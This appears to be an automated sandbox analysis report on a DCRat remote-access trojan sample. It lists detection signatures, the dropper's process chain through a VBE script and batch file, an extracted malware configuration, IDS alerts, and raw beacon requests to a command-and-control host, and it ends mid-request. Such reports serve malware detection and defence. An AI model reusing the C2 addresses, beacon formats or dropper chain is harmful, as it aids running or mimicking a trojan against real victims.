Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5Ixz5yVfS7.exe

Overview

General Information

Sample name:5Ixz5yVfS7.exe
renamed because original name is a hash value
Original sample name:7b4eccf10cc4fa7263646f2fce4d7f8b.exe
Analysis ID:1583156
MD5:7b4eccf10cc4fa7263646f2fce4d7f8b
SHA1:06111e9aa4ae84c68208e3800ad757f1eb80c227
SHA256:752b44a9225f3423d045835f61cedc897696680e2caeead0d472f367da14e898
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 5Ixz5yVfS7.exe (PID: 5504 cmdline: "C:\Users\user\Desktop\5Ixz5yVfS7.exe" MD5: 7B4ECCF10CC4FA7263646F2FCE4D7F8B)
    • wscript.exe (PID: 5908 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5588 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Bridgecontainer.exe (PID: 5688 cmdline: "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe" MD5: 21879480EBF05FF55A58FC933CB818A4)
  • cleanup
{"SCRT": "{\"1\":\"%\",\"6\":\"!\",\"I\":\"#\",\"H\":\">\",\"S\":\"$\",\"3\":\",\",\"9\":\"<\",\"5\":\"*\",\"A\":\"|\",\"i\":\"(\",\"G\":\"`\",\"4\":\"@\",\"U\":\".\",\"k\":\"~\",\"y\":\";\",\"2\":\")\",\"L\":\"^\",\"W\":\"_\",\"o\":\"-\",\"h\":\"&\",\"0\":\" \"}", "PCRT": "{\"0\":\";\",\"=\":\"(\",\"y\":\")\",\"I\":\"&\",\"x\":\"_\",\"w\":\".\",\"e\":\"$\",\"S\":\"#\",\"M\":\"%\",\"i\":\"-\",\"f\":\"!\",\"p\":\"`\",\"l\":\" \",\"j\":\"<\",\"X\":\"*\",\"b\":\"|\",\"Q\":\">\",\"6\":\",\",\"D\":\"@\",\"c\":\"^\"}", "TAG": "", "MUTEX": "xuesos_pidorasovich_dcratovich", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 0, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
SourceRuleDescriptionAuthorStrings
00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
    00000005.00000002.4473483339.0000000002F3C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
      00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
        00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
            Click to see the 4 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5Ixz5yVfS7.exe", ParentImage: C:\Users\user\Desktop\5Ixz5yVfS7.exe, ParentProcessId: 5504, ParentProcessName: 5Ixz5yVfS7.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , ProcessId: 5908, ProcessName: wscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5Ixz5yVfS7.exe", ParentImage: C:\Users\user\Desktop\5Ixz5yVfS7.exe, ParentProcessId: 5504, ParentProcessName: 5Ixz5yVfS7.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , ProcessId: 5908, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5Ixz5yVfS7.exe", ParentImage: C:\Users\user\Desktop\5Ixz5yVfS7.exe, ParentProcessId: 5504, ParentProcessName: 5Ixz5yVfS7.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , ProcessId: 5908, ProcessName: wscript.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5Ixz5yVfS7.exe", ParentImage: C:\Users\user\Desktop\5Ixz5yVfS7.exe, ParentProcessId: 5504, ParentProcessName: 5Ixz5yVfS7.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , ProcessId: 5908, ProcessName: wscript.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-02T05:17:06.085876+010020341941A Network Trojan was detected192.168.2.549704141.8.192.15180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-02T05:17:12.379192+010028508621Malware Command and Control Activity Detected141.8.192.15180192.168.2.549706TCP
            2025-01-02T05:18:27.514248+010028508621Malware Command and Control Activity Detected141.8.192.15180192.168.2.549987TCP
            2025-01-02T05:20:28.241324+010028508621Malware Command and Control Activity Detected141.8.192.15180192.168.2.550009TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 5Ixz5yVfS7.exeAvira: detected
            Source: http://f1069581.xsph.ruAvira URL Cloud: Label: malware
            Source: http://f1069581.xsph.ru/L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyrAvira URL Cloud: Label: malware
            Source: http://f1069581.xsph.ru/Avira URL Cloud: Label: malware
            Source: http://f1069581.xsph.ru/L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5oAvira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"1\":\"%\",\"6\":\"!\",\"I\":\"#\",\"H\":\">\",\"S\":\"$\",\"3\":\",\",\"9\":\"<\",\"5\":\"*\",\"A\":\"|\",\"i\":\"(\",\"G\":\"`\",\"4\":\"@\",\"U\":\".\",\"k\":\"~\",\"y\":\";\",\"2\":\")\",\"L\":\"^\",\"W\":\"_\",\"o\":\"-\",\"h\":\"&\",\"0\":\" \"}", "PCRT": "{\"0\":\";\",\"=\":\"(\",\"y\":\")\",\"I\":\"&\",\"x\":\"_\",\"w\":\".\",\"e\":\"$\",\"S\":\"#\",\"M\":\"%\",\"i\":\"-\",\"f\":\"!\",\"p\":\"`\",\"l\":\" \",\"j\":\"<\",\"X\":\"*\",\"b\":\"|\",\"Q\":\">\",\"6\":\",\",\"D\":\"@\",\"c\":\"^\"}", "TAG": "", "MUTEX": "xuesos_pidorasovich_dcratovich", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 0, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeReversingLabs: Detection: 78%
            Source: 5Ixz5yVfS7.exeReversingLabs: Detection: 68%
            Source: 5Ixz5yVfS7.exeVirustotal: Detection: 57%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeJoe Sandbox ML: detected
            Source: 5Ixz5yVfS7.exeJoe Sandbox ML: detected
            Source: 5Ixz5yVfS7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5Ixz5yVfS7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 5Ixz5yVfS7.exe
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0059A5F4
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005AB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_005AB8E0
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005BAAA8 FindFirstFileExA,0_2_005BAAA8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49704 -> 141.8.192.151:80
            Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.151:80 -> 192.168.2.5:49706
            Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.151:80 -> 192.168.2.5:49987
            Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.151:80 -> 192.168.2.5:50009
            Source: Joe Sandbox ViewIP Address: 141.8.192.151 141.8.192.151
            Source: Joe Sandbox ViewIP Address: 141.8.192.151 141.8.192.151
            Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&154d77d402106dff3d2a63610a8c9212=d1nIw4WSzh3RSZnUuJGcS5mY2p1RkVnVtJmdChlY25URYNmQYJGbSZEWjh3VZpWOHR1Y4ZVWwY0RSdnQYF1Y4FzY1lTbaNnRHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL